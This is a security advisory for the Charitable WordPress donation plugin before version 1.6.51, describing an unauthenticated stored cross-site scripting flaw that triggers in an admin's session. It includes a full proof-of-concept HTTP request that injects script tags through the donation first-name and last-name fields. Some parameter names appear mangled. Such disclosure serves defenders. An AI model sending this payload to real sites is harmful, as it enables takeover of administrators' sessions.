Charitable - Donation Plugin < 1.6.51 - Unauthenticated Stored Cross-Site Scripting

While fixing an Authenticated Stored Cross-Site Scripting issue (https://wpscan.com/vulnerability/a5837621-ee6e-4876-9f65-82658fc0341f), the vendor identified another Cross-Site Scripting issue, which could be exploited by unauthenticated users and would be triggered in the context of a logged in admin

PoC

Submit (as unauth) a donation with as First Name or Last Name, then view the donation lists as admin to trigger the XSS POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 501 Connection: close charitable_form_id=60f1bb21849de&60f1bb21849de=&_charitable_donation_nonce=dd32c048d6&_wp_http_referer=%2Fwordpress%2Fcampaigns%2Ftest%2Fdonate%2F&campaign;_id=1148&description;=Test&ID;=0&gateway;=offline&custom;_donation_amount=1.00&first;_name=test%22%3E%3Cscript%3Ealert(%2FXSS-FN%2F)%3C%2Fscript%3E&last;_name=test%22%3E%3Cscript%3Ealert(%2FXSS-LN%2F)%3C%2Fscript%3E&email;=fjrekhg%40nferhf.com&address;=&address;_2=&city;=&state;=&postcode;=&country;=AF&phone;=&action;=make_donation&form;_action=make_donation